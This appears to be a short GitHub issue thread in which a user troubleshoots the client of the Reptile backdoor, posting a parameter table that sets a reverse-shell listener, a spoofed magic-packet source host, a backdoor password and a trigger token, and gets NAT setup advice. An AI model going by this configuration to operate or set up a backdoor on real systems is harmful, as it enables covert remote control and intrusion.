Closed MRchen532 closed 4 years ago
did you try read the manual bro???
The right argument is RPORT !!!
Yes,I see it,but there has been no access.I don't know if my parameter configuration is wrong. Can you help me?
VAR VALUE DESCRIPTION
LHOST 192.168.175.154 Local host to receive the shell LPORT 4444 Local port to receive the shell SRCHOST 192.168.175.151 Source host on magic packets (spoof) SRCPORT 666 Source port on magic packets (only for TCP/UDP) RHOST 192.168.175.151 Remote host RPORT 22 Remote port (only for TCP/UDP) PROT 80 Protocol to send magic packet (ICMP/TCP/UDP) PASS s3cr3t Backdoor password (optional) TOKEN hax0r Token to trigger the shell
reptile-client> run [+] Using password: s3cr3t [+] Listening on port 4444... Always been like this
if you are trying to use it through NAT, use SRCHOST == LHOST
Obviously if the sender of the magic packet is the same host that you are receiving the reverse shell.
Ok, I have solved it, thank you! I also want to know what technologies are used for communication, hidden file hiding, and remote control?
reptile-client> set PORT TCP=1 [-] wrong parameter! How to set PORT ?